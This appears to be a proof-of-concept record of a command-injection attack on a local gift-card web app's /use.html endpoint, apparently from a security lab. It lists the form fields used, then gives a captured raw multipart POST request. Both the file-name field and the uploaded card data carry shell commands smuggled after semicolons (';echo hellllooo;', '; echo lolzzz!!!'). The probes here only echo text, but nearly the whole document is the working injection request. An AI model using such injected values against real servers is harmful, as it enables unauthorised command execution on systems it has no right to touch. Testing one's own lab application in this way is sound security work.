http://127.0.0.1:8000/use.html

card_data = this can be anything, just not json loadable
card_supplied = True
card_fname = ;echo helllooo;




#Actual Copy of the request used


POST /use.html HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 439
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQaSzFLyG5h7hfiAh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/use.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=iemmummuv6fme60pvfecf2kkjg6ogx2c
Connection: close

------WebKitFormBoundaryQaSzFLyG5h7hfiAh
Content-Disposition: form-data; name="card_data"; filename="n.gftcrd"
Content-Type: application/octet-stream

mofo; echo lolzzz!!!

------WebKitFormBoundaryQaSzFLyG5h7hfiAh
Content-Disposition: form-data; name="card_supplied"

True
------WebKitFormBoundaryQaSzFLyG5h7hfiAh
Content-Disposition: form-data; name="card_fname"

;echo hellllooo;
------WebKitFormBoundaryQaSzFLyG5h7hfiAh--
